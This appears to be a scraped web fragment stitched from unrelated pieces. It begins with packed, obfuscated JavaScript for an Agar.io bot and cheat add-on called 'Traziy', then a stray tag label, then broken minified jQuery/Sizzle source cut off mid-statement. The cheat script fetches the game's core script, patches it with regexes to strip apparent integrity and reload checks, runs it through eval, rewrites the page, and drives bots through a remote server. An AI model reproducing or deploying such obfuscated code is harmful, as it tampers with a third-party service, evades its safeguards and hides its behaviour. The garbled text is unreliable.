k=e.2L;k=L(k,/\\w+\\.3X\\.5H/g,\'"4R.30"\'),k=p(k,"1q","Z"),k=p(k,"c.4B=j(a){S.P(a)};","c.4B=j(a){};"),k=p(k,\'S.P("5L");\',""),k=L(k,/(\\w)=\\+\\(\\(\\w\\[\\w\\+\\d+>>\\d.*;(\\w)=\\+\\(\\(\\w\\[.*\\/2\\|\\d\\)\\|0\\)\\/\\w\\+\\s\\+\\w\\[\\w\\+\\d+>>3\\];/,"$1 = 6.36; $2 = 6.3a;"),k=p(k,"l(h.m&&h.m.2x)","6.2H();l(h.m&&h.m.2x)"),k=p(k,"l(h.m&&h.m.2U)","6.2r();l(h.m&&h.m.2U)"),k=p(k,"l(h.m&&h.m.1n)","6.1n();l(h.m&&h.m.1n)"),k=p(k,"l(h.m&&h.m.2z)","6.2o();l(h.m&&h.m.2z)"),k=p(k,"h.m&&h.m.4K","6.2y();h.m&&h.m.4K"),k=L(k,/(\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);\\w\\[\\w\\+(\\d+)>>3]=(\\w);)/i,"$1 l(6.1Q){6.1Q($3,$5,$7,$9,$2,$8);}"),k=L(k,/([\\w$]+\\(\\d+,\\w\\[\\w>>2\\]\\|0,(\\+\\w),(\\+\\w)\\)\\|0;[\\w$]+\\(\\d+,\\w\\[\\w>>2\\]\\|0,\\+-(\\+\\w\\[\\w\\+\\d+>>3\\]),\\+-(\\+\\w\\[\\w\\+\\d+>>3\\])\\)\\|0;)/i,"$1 6.1B=$4; 6.1x=$5;"),3q(k)},e.2T(B)}Z.5O=1,Z.5M=1;5N 1q={},3h={4G:j(){v{1z:{U:1,2E:1},5t:j(){},5s:j(){},5q:j(){},5r:j(){},5w:j(){},5x:j(){},5C:j(){},5B:j(){},5A:j(){},5y:j(){},5z:j(){},5R:j(){},5S:j(){},4N:j(){v{}},6e:j(){},3l:j(){},6b:j(){}}},6f:"",G:{3p:j(){}},3p:j(){},N:{}},V={4U:j(){v 3h},1O:j(a){v 3h},2D:{6g:{},6k:j(){}}},6j=j(){};Z.6={J:B,F:0,1w:"3Q",1B:0,1x:0,36:0,3a:0,13:B,19:B,1S:2Y,1e:0,1g:0,2u:!1,1Q:j(a,b,c,d,e,f){f-e==24&&c-a>2B&&d-b>2B&&(C.1e=C.1S-c,C.1g=C.1S-d,C.2u=!0)},2r:j(){1l({o:"2b",F:6.F})},2H:j(){1l({o:"39",F:6.F,1w:6.1w,x:6.13,y:6.19})},2o:j(){1l({o:"2b",F:6.F}),Z.r&&r.1C(6.J)},2y:j(){Z.r&&Z.r.6h(),3g()},1n:j(){B!=6.J&&Z.r&&r.1C(6.J)}},46=j(a){n b=a.2m;2k(b.o){q"F":6.F=b.F;t;q"J":6.J=b.J,Z.r&&r.1C(b.J);t;q"18":6.36=b.x-6.1e,6.3a=b.y-6.1g;t;q"1c":r.1c();t;q"1H":r.1H();t;q"2P":l(B==b.14){6.1w="3Q";t}6.1w=b.14[3P(0,b.14.17-1)];t;q"1Y":6.J=B,Z.r&&r.1Y(),S.P("5X 1m 5W");t;3d:S.P("4q 5V 4r.")}},1v(j(){6.13=6.1e+6.1B,6.19=6.1g+6.1x,1l({F:6.F,o:"18",x:6.13,y:6.19}),Z.r&&r.3c(6.1w)},1L),3g()}.64()}1q.63.62("","","/"+3X.60),1q.2t=j(a,b){n c=2t.1z||(2t.1z=V.1O("1z")),d=c.4G("2d");d.u=b;n e=d.4N(a);v e.U};n 1s=2X.4V("49");l(B===1s){1s="";1o(n 3j="6m",3i=0;3i<15;3i++)1s+=3j.5b(2F.4b(2F.4t()*3j.17));2X.47("49",1s)}1q.6={J:B,1b:"",1B:0,1x:0,34:0,33:0,13:B,19:B,1S:2Y,1e:0,1g:0,2u:!1,37:1,59:0,4D:.9,4z:!0,2j:!1,2g:!1,2h:!0,1K:{},2G:{},2O:B,1W:{},6v:{},3k:"",1Q:j(a,b,c,d,e,f){f-e==24&&c-a>2B&&d-b>2B&&(C.1e=C.1S-c,C.1g=C.1S-d,C.2u=!0)},2r:j(){6.2g=!1,1i("1X",C.13,C.19),$("#1k").1d(),$("#1X").1h(),1f({o:"7x"})},2H:j(){6.2g=!0,3b("1k",6.1b),$("#1P").1d(),$("#1k").1h(),1f({o:"4L",1b:6.1b})},4O:j(a){2c(),B!=C.2O&&C.2O==a&&2N({o:"1Y"}),6.J=a,S.P("7w Y: "+a),1y("1k",!1),1y("1X",!1),1y("1P",!1),1E({o:"J",J:a})},2o:j(){2c(),1y("1k",!1),1y("1X",!1),1y("1P",!1),S.P("7v 4C J."),6.J=B,6.2g=!1},54:j(){$("#1k").1d(),$("#1P").1h()},56:j(a){C.1b=a},4Y:j(){7z(j(){5a(),58()},7A),S.P("3T r.");n b=(V.4U("1z"),2X.4V("1I"));B!==b&&(6.14=38(b),B!==6.14&&$("#1I").2s(b),2K()),$("#1I").2M("12",j(){n a=$("#1I").2s(),b=38(a);6.14=b,2K(),B!==b&&2X.47("1I",a)}),$("#4A").7E(j(a){n b=$("#2V")[0];b.7D(0,b.3F.17),b.7C();7B{1q.V.7u("4k")}7t(a){S.P("2l Y 4k 2V.")}});n c,d=!1,e=!1,f=!1;$(V).7m(j(a){2k(a.42){q 65:6.2h=!6.2h,6.2h?$("#3v").1j("3s "):$("#3v").1j("3K ");t;q 68:6.2j=!6.2j,6.2j?$("#3H").1j("3s "):$("#3H").1j("3K ");t;q 69:4W();t;q 82:4I();t;q 72:e=!e,e?$("#2f").1d():$("#2f").1h();t;q 72:e=!e,e?$("#2f").1d():$("#2f").1h();t;q 76:t;q 77:f=!f,f?$("#1t").1d():$("#1t").1h();t;q 87:l(d)v;d=!0,c=1v(j(){r.1H()},50)}}),$(V).7q(j(a){2k(a.42){q 87:d=!1,3f(c);t;q 84:n b=0,e=1v(j(){v b>7?1u 3f(e):(b++,1u r.1c())},50);t;q 81:n f=0,g=1v(j(){v f>1?1u 3f(g):(f++,1u r.1c())},50)}}),4f(),1M(!0,"1k",6.1b,"#80",!1),1M(!0,"1X","88 86","#7U",!1),1M(!0,"1P","7T","#7L",!1),4p(),3e(),1v(j(){m.51()},7K)},2y:j(){S.P("7J 7H."),3e()},1n:j(){S.P("3T 7I 7M 1F r."),r.6n(!$("#7N").26(":23")),r.7S(!$("#7R").26(":23")),r.7Q(!$("#7O").26(":23")),r.7P($("#7h").26(":23")),r.7g($("#6G").26(":23"))}};n 2q="",1J=1;3m.3o.35=3m.3o.3l,3m.3o.3l=j(){C.35.52(C,27),"6F"===27[0]?(6.3k=2q,1J=1,2q="",$("#2V").2s(6.3k)):":6E"!=$("#6C").2s()&&0==27[0].21(1J+".")&&1J<11?(2q+=27[0]+(1J<=9?", ":""),1J++):C.35.52(C,27)};n b=1a 2J;b.2a("2I","/4Q/1F.1p",!0),b.1U=j(){n k=b.2L;k=p(k,\'l(1p.6H==32&&1T!="6M"){1p.6L()}\',""),k=p(k,"57:j(i){l","57:j(i){},6K:j(i){l"),k=p(k,"55:j(","55:j(i){},6J: j("),k=L(k,/(v\\s\\w+.6A.28\\(\\)).21\\(\\w+.28\\(\\)\\)!=-1/,"$1 != \'4y\'"),k=L(k,/l\\(\\w+.6s\\(\\w+.6q.*6o\\)\\)\\{6p\\}/,""),k=p(k,"l(C.4w(1T.29).17>0",\'l (C.4w(1T.29).17 > 0 && (1T.29.28() == "6t" || 1T.29.28() == "4y" || 1T.29.28() == "6u")\'),k=L(k,/n\\6z=1q.V.1O..k..+6y.3p.6x../i,"6.2y();"),k=L(k,/(6N:j\\(\\)\\{n.*79\\(\\);l\\(([a-2C-2p-9]+[a-2C-2p-9]+.78.75==B).*73\\);([a-2C-2p-9]+[a-2C-2p-9]+.7a\\(\\)).*C.7b\\)\\)\\}},)/,"$1 51: j(){l($2){v;}$3;},"),3q(k);n e=1a 2J;e.2a("2I","/",!0),e.1U=j(){n a=e.2L;a=p(a,\' \'," 6 4M <16>4M: 0 / 2 <16>A - 6W 6R 7f: 3s <16>D - 7s 7n: 3K "),a=p(a,"<2D>",\'<2D 1U="6.4Y()">\'),a=L(a,/<\\/k>/i,""),a=L(a,//i,\'\'),a=p(a,\'\',\'\'),a=p(a,\' <16/>\',\' <16/>2e Q Y 7k 1c <16>7y W Y 7i 6D 4j <16>2e M Y 1d/1h 4h 1t <16>2e E Y 1c 3B <16>2e R Y 1H 70 3B 4j <16>2e H Y 1d/1h 4h 1m 74 \'),a=p(a,\'\',\'6w <12 K="2V" 2n="1R" 3F="" N="U:6r" 4Z X="3u-3y"><44 K="4A" X="4H 4H-6B" N="6I: 41; U: 89; 4d-4s: 2v 4a 4a 2v;" 2m-83-3W="" 3W="">7W44>7X <12 2n="1R" 3F="\'+1s+\'" N="U:4F" 4Z X="3u-3y">7Y <12 K="1I" X="3u-3y" N="U:4F" 7Z="7G 1m 2P 7F 7p" 7r="">\'),V.2a(),V.7o(a),V.7j()},e.2T()},b.2T(),1v(j(){6.13=6.1e+6.1B,6.19=6.1g+6.1x,1i("1k",6.13,6.19),1i("1P",6.13,6.19)},50);n 2S=B,1A=B;7l=1v(j(){4m(),3n(!1)},1L);',62,506,'||||||Traziy|||||||||||||function|script|if|MC|var|name|replaceNormalFile|case|core||break|font|return||||||null|this|||botID|div||span|server|id|replaceRegexFile||style|replace|log|||console|color|width|document||class|to|self|||input|realPlayerX|botNames||br|length|position|realPlayerY|new|playerName|split|hide|mapOffsetX|sendCommand|mapOffsetY|show|moveBallOnMinimap|html|player_pointer|postMessage|bot|onAgarioCoreLoaded|for|js|window|10px|client_uuid|minimap|void|setInterval|botName|playerY|setBallVisible|canvas|socket|playerX|connect|group|sendLocalBotsMessage|agario|display|eject|botnames|tempLeaderBoardIndex|localBots|100|addBallToMinimap|top|createElement|player_spectate|setMapCoords|text|mapOffset|i1|onload|command|remoteBots|player_death|disconnect|red||indexOf|none|checked||green|is|arguments|toUpperCase|tabDescription|open|remove|resetMinimap||Press|botcanvas|isAlive|moveToMouse|margin|stopMovement|switch|Failed|data|type|playerDisconnected|Z0|tempLeaderBoard|playerDied|val|getTextWidth|mapOffsetFixed|0px|botCount|onPlayerSpawn|reloadCore|onDisconnect|socketID|14e3|zA|body|height|Math|localBotsAlive|playerSpawned|GET|XMLHttpRequest|updateBotNames|responseText|on|sendRemoteBotsMessage|remoteBotsServer|names|background|opacity|last_transmited_game_server|send|onPlayerDeath|leaderboard|left|localStorage|7071|container|io|||mouseY|mouseX|_fillText|newX|zoomValue|validateNames|add|newY|changeNicknameOnBall|sendNick|default|insertCore|clearInterval|getBotCore|elementMock|ii|ranStr|leaderboardData|fillText|CanvasRenderingContext2D|transmit_current_server|prototype|appendChild|eval|addon1|On|basic|form|ismoveToMouse|Ubuntu|removeBallFromMinimap|control|75px|addon|bots|append|balls_holder|updateBotCount|value|6px|isStopMove|javascript|5px|Off|size|in|generateBotFunction|absolute|getRandomInt|TraziyGaming|itr|badge|Loading|page_instructions_w|249px|title|location|promo|cross||right|which|block|button|adsBottom|onmessage|setItem|diep|Traziy_uuid|4px|floor|bottom|border|fantasy|createMinimap|test|the|14142|mass|copy|cssText|emitPosition|Worker|http|connectToTraziyServer|Unknown|received|radius|random|RegExp|src|getSkinsByCategory|setTarget|VETERAN|autoZoom|leaderboardcopy|setStatus|from|zoomSpeedValue|with|245px|getContext|btn|emitMassEject|family|corePendingReload|alive|Bots|measureText|playerConnected|tags|mc|agar|createObjectURL|Blob|getElementById|getItem|emitSplit|URL|loadCore|readonly||TraziyFreeCoins|apply|sendSpectate|playerSpectated|showPromoBadge|updateNickname|showAds|startRemoteBots|zoomResetValue|startLocalBots|charAt|pointer|index|tk|url|rgba|140|empty|FF00FF|www|png|else|TraziyGaming|fixed|ws|translate|scale|save|clearRect|force|no|stroke|arc|closePath|beginPath|lineTo|moveTo|fill|update|FFFFFF|unknown|an|hostname|botX|botY|Received|postRun|innerHeight|const|innerWidth|spawn|count|restore|fillRect|emit|px|message|disconect|remote|300px|css|hash|events|replaceState|history|toString||96|154|||query|drawImage|key|Recieved|strokeText|innerText|firstChild|destroy|8084|Image|insertBefore|reconnection|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|setSkins|visibility|continue|productIdToQuantify|185px|shouldSkipConfigEntry|PREMIUM|OWNED|remoteBotsAlive|BOARD|i2|head|si2|tab|primary|gamemode|fire|teams|Leaderboard|darkTheme|keyCode|float|fuckbacks|showFuck|preventDefault|nick|showFreeCoins|leaders|zoom|205px|To|alpha|filter|align|center|Move|padding|ffffff|15px|some|khtml||false|dialog|userInfo|||user|showContainer|triggerFreeCoins|onShopClose|moz|000000|async|Mouse|setDarkTheme|showMass|rapid|close|double|interval_id|keydown|Movement|write|commas|keyup|autofocus|Stop|catch|execCommand|Disconnected|Connecting|dead|Hold|setTimeout|2e3|try|select|setSelectionRange|click|using|Separate|Core|settings|Reloading|5e3|0000FF|into|noSkins|noColors|setShowMass|setColors|noNames|setNames|Spectate|FF2400|uuidbots|Copy|UUID|NAMES|placeholder|00FF00|||original|||Death||Last|60px'.split('|'),0,{}))" class="topic-tag topic-tag-link">
TraziyGaming530
)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof x?n[0]:n,x.merge(this,x.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:a,!0)),k.test(i[1])&&x.isPlainObject(n))for(i in n)x.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=a.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=a,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):x.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),x.makeArray(e,this))},selector:"",length:0,toArray:function(){return g.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=x.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return x.each(this,e,t)},ready:function(e){return x.ready.promise().done(e),this},slice:function(){return this.pushStack(g.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(x.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},x.fn.init.prototype=x.fn,x.extend=x.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},l=1,u=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},l=2),"object"==typeof s||x.isFunction(s)||(s={}),u===l&&(s=this,--l);u>l;l++)if(null!=(o=arguments[l]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(x.isPlainObject(r)||(n=x.isArray(r)))?(n?(n=!1,a=e&&x.isArray(e)?e:[]):a=e&&x.isPlainObject(e)?e:{},s[i]=x.extend(c,a,r)):r!==t&&(s[i]=r));return s},x.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),noConflict:function(t){return e.$===x&&(e.$=u),t&&e.jQuery===x&&(e.jQuery=l),x},isReady:!1,readyWait:1,holdReady:function(e){e?x.readyWait++:x.ready(!0)},ready:function(e){if(e===!0?!--x.readyWait:!x.isReady){if(!a.body)return setTimeout(x.ready);x.isReady=!0,e!==!0&&--x.readyWait>0||(n.resolveWith(a,[x]),x.fn.trigger&&x(a).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===x.type(e)},isArray:Array.isArray||function(e){return"array"===x.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?c[y.call(e)]||"object":typeof e},isPlainObject:function(e){var n;if(!e||"object"!==x.type(e)||e.nodeType||x.isWindow(e))return!1;try{if(e.constructor&&!v.call(e,"constructor")&&!v.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}if(x.support.ownLast)for(n in e)return v.call(e,n);for(n in e);return n===t||v.call(e,n)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||a;var r=k.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=x.buildFragment([e],t,i),i&&x(i).remove(),x.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=x.trim(n),n&&E.test(n.replace(A,"@").replace(j,"]").replace(S,"")))?Function("return "+n)():(x.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||x.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&x.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(D,"ms-").replace(L,H)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:b&&!b.call("\ufeff\u00a0")?function(e){return null==e?"":b.call(e)}:function(e){return null==e?"":(e+"").replace(C,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?x.merge(n,"string"==typeof e?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(m)return m.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return d.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),x.isFunction(e)?(r=g.call(arguments,2),i=function(){return e.apply(n||this,r.concat(g.call(arguments)))},i.guid=e.guid=e.guid||x.guid++,i):t},access:function(e,n,r,i,o,a,s){var l=0,u=e.length,c=null==r;if("object"===x.type(r)){o=!0;for(l in r)x.access(e,n,l,r[l],!0,a,s)}else if(i!==t&&(o=!0,x.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(x(e),n)})),n))for(;u>l;l++)n(e[l],r,s?i:i.call(e[l],l,n(e[l],r)));return o?e:c?n.call(e):u?n(e[0],r):a},now:function(){return(new Date).getTime()},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),x.ready.promise=function(t){if(!n)if(n=x.Deferred(),"complete"===a.readyState)setTimeout(x.ready);else if(a.addEventListener)a.addEventListener("DOMContentLoaded",q,!1),e.addEventListener("load",q,!1);else{a.attachEvent("onreadystatechange",q),e.attachEvent("onload",q);var r=!1;try{r=null==e.frameElement&&a.documentElement}catch(i){}r&&r.doScroll&&function o(){if(!x.isReady){try{r.doScroll("left")}catch(e){return setTimeout(o,50)}_(),x.ready()}}()}return n.promise(t)},x.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){c["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=x.type(e);return x.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=x(a),function(e,t){var n,r,i,o,a,s,l,u,c,p,f,d,h,g,m,y,v,b="sizzle"+-new Date,w=e.document,T=0,C=0,N=st(),k=st(),E=st(),S=!1,A=function(e,t){return e===t?(S=!0,0):0},j=typeof t,D=1<<31,L={}.hasOwnProperty,H=[],q=H.pop,_=H.push,M=H.push,O=H.slice,F=H.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},B="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",W=R.replace("w","w#"),$="\\["+P+"*("+R+")"+P+"*(?:([*^$|!~]?=)"+P+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+W+")|)|)"+P+"*\\]",I=":("+R+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+$.replace(3,8)+")*)|.*)\\)|)",z=RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),X=RegExp("^"+P+"*,"+P+"*"),U=RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),V=RegExp(P+"*[+~]"),Y=RegExp("="+P+"*([^\\]'\"]*)"+P+"*\\]","g"),J=RegExp(I),G=RegExp("^"+W+"$"),Q={ID:RegExp("^#("+R+")"),CLASS:RegExp("^\\.("+R+")"),TAG:RegExp("^("+R.replace("w","w*")+")"),ATTR:RegExp("^"+$),PSEUDO:RegExp("^"+I),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+P+"*(even|odd|(([+-]|)(\\d*)n|)"+P+"*(?:([+-]|)"+P+"*(\\d+)|))"+P+"*\\)|)","i"),bool:RegExp("^(?:"+B+")$","i"),needsContext:RegExp("^"+P+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+P+"*((?:-\\d)?\\d*)"+P+"*\\)|)(?=[^-]|$)","i")},K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,et=/^(?:input|select|textarea|button)$/i,tt=/^h\d$/i,nt=/'|\\/g,rt=RegExp("\\\\([\\da-f]{1,6}"+P+"?|("+P+")|.)","ig"),it=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:0>r?String.fromCharCode(r+65536):String.fromCharCode(55296|r>>10,56320|1023&r)};try{M.apply(H=O.call(w.childNodes),w.childNodes),H[w.childNodes.length].nodeType}catch(ot){M={apply:H.length?function(e,t){_.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function at(e,t,n,i){var o,a,s,l,u,c,d,m,y,x;if((t?t.ownerDocument||t:w)!==f&&p(t),t=t||f,n=n||[],!e||"string"!=typeof e)return n;if(1!==(l=t.nodeType)&&9!==l)return[];if(h&&!i){if(o=Z.exec(e))if(s=o[1]){if(9===l){if(a=t.getElementById(s),!a||!a.parentNode)return n;if(a.id===s)return n.push(a),n}else if(t.ownerDocument&&(a=t.ownerDocument.getElementById(s))&&v(t,a)&&a.id===s)return n.push(a),n}else{if(o[2])return M.apply(n,t.getElementsByTagName(e)),n;if((s=o[3])&&r.getElementsByClassName&&t.getElementsByClassName)return M.apply(n,t.getElementsByClassName(s)),n}if(r.qsa&&(!g||!g.test(e))){if(m=d=b,y=t,x=9===l&&e,1===l&&"object"!==t.nodeName.toLowerCase()){c=mt(e),(d=t.getAttribute("id"))?m=d.replace(nt,"\\$&"):t.setAttribute("id",m),m="[id='"+m+"'] ",u=c.length;while(u--)c[u]=m+yt(c[u]);y=V.test(e)&&t.parentNode||t,x=c.join(",")}if(x)try{return M.apply(n,y.querySelectorAll(x)),n}catch(T){}finally{d||t.removeAttribute("id")}}}return kt(e.replace(z,"$1"),t,n,i)}function st(){var e=[];function t(n,r){return e.push(n+=" ")>o.cacheLength&&delete t[e.shift()],t[n]=r}return t}function lt(e){return e[b]=!0,e}function ut(e){var t=f.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function ct(e,t){var n=e.split("|"),r=e.length;while(r--)o.attrHandle[n[r]]=t}function pt(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||D)-(~e.sourceIndex||D);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function dt(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ht(e){return lt(function(t){return t=+t,lt(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}s=at.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},r=at.support={},p=at.setDocument=function(e){var n=e?e.ownerDocument||e:w,i=n.defaultView;return n!==f&&9===n.nodeType&&n.documentElement?(f=n,d=n.documentElement,h=!s(n),i&&i.attachEvent&&i!==i.top&&i.attachEvent("onbeforeunload",function(){p()}),r.attributes=ut(function(e){return e.className="i",!e.getAttribute("className")}),r.getElementsByTagName=ut(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),r.getElementsByClassName=ut(function(e){return e.innerHTML="
",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),r.getById=ut(function(e){return d.appendChild(e).id=b,!n.getElementsByName||!n.getElementsByName(b).length}),r.getById?(o.find.ID=function(e,t){if(typeof t.getElementById!==j&&h){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){return e.getAttribute("id")===t}}):(delete o.find.ID,o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){var n=typeof e.getAttributeNode!==j&&e.getAttributeNode("id");return n&&n.value===t}}),o.find.TAG=r.getElementsByTagName?function(e,n){return typeof n.getElementsByTagName!==j?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},o.find.CLASS=r.getElementsByClassName&&function(e,n){return typeof n.getElementsByClassName!==j&&h?n.getElementsByClassName(e):t},m=[],g=[],(r.qsa=K.test(n.querySelectorAll))&&(ut(function(e){e.innerHTML=" ",e.querySelectorAll("[selected]").length||g.push("\\["+P+"*(?:value|"+B+")"),e.querySelectorAll(":checked").length||g.push(":checked")}),ut(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("t",""),e.querySelectorAll("[t^='']").length&&g.push("[*^$]="+P+"*(?:''|\"\")"),e.querySelectorAll(":enabled").length||g.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),g.push(",.*:")})),(r.matchesSelector=K.test(y=d.webkitMatchesSelector||d.mozMatchesSelector||d.oMatchesSelector||d.msMatchesSelector))&&ut(function(e){r.disconnectedMatch=y.call(e,"div"),y.call(e,"[s!='']:x"),m.push("!=",I)}),g=g.length&&RegExp(g.join("|")),m=m.length&&RegExp(m.join("|")),v=K.test(d.contains)||d.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},A=d.compareDocumentPosition?function(e,t){if(e===t)return S=!0,0;var i=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t);return i?1&i||!r.sortDetached&&t.compareDocumentPosition(e)===i?e===n||v(w,e)?-1:t===n||v(w,t)?1:c?F.call(c,e)-F.call(c,t):0:4&i?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return S=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:c?F.call(c,e)-F.call(c,t):0;if(o===a)return 